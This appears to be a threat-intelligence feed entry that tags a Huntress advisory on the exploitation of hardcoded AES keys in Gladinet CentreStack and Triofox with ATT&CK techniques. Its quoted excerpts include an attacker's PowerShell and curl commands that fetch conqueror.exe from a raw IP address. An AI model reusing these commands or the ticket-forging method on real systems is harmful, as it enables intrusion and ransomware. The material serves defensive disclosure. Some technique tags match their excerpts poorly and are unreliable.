TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Huntress

Gladinet CentreStack/Triofox: Cryptography Vulnerability | Huntress

2025-12-18

ATT&CK techniques detected

8 predictions
T1059.001 PowerShell
100%
"…request http://185.196.11.207:8000/conqueror.exe -outfile c:\users\public\conqueror.exe. Figure 1: Process tree for detected PowerShell command execution on Dec. 15 across two incidents. In one of the incidents, after the payload was retrieved from hxxp[:…"
T1059.001 PowerShell
96%
"Gladinet CentreStack/Triofox: Cryptography Vulnerability | Huntress. Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and write-up. Update #2: 12/18/25 @ 6pm ET: We've seen reports from other intelligence firms that note that…"
T1486 Data Encrypted for Impact
91%
"that reveals the following in cleartext: curl http://185.196.11.207:8000. Unfortunately, the conqueror.exe was no longer present on the file system for us to analyze further. We uncovered the SHA256 hash e9fa82d92d826c6a1c38165fe6bd610d3b80cd5d53ec65ac3fe94393be64b5a5 b…"
T1190 Exploit Public-Facing Application
83%
"a ticket that never expires. The attacker can reuse this exact URL indefinitely to download the server's configuration. Exploitation Activity: As of December 10, we have seen nine organizations that have been impacted by this vulnerability. These businesses ranged across differe…"
T1486 Data Encrypted for Impact
66%
"file system as that specific user. Upon debugging the running process, we discovered that the generateseckey, located in gladctrl64.dll, returns the exact same 100-byte text strings. - The key source: a static string of Chinese text. - The IV source: a static string of Japane…"
T1558.003 Kerberoasting
48%
". This method retrieves the first 32 bytes of the static syskey and the first 16 bytes of syskey1 to configure an AES-256 decryption provider. Because these keys are derived from the generated 100-byte strings, any ticket encrypted with these specific bytes is trusted by the…"
T1486 Data Encrypted for Impact
46%
"CVE-2025-30406. At present, we cannot say definitively that this is exploitation by the Cl0p ransomware gang, but considering the timing of this reporting, we felt it was prudent to share this recent threat intel. We are continuing the hunt and monitoring for further Gladinet…"
T1486 Data Encrypted for Impact
38%
"Gladinet CentreStack/Triofox: Cryptography Vulnerability | Huntress. Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and write-up. Update #2: 12/18/25 @ 6pm ET: We've seen reports from other intelligence firms that note that…"

Summary

Threat actors are exploiting a vulnerability in Gladinet’s CentreStack and Triofox products that stems from hardcoded cryptographic keys in the AES implementation.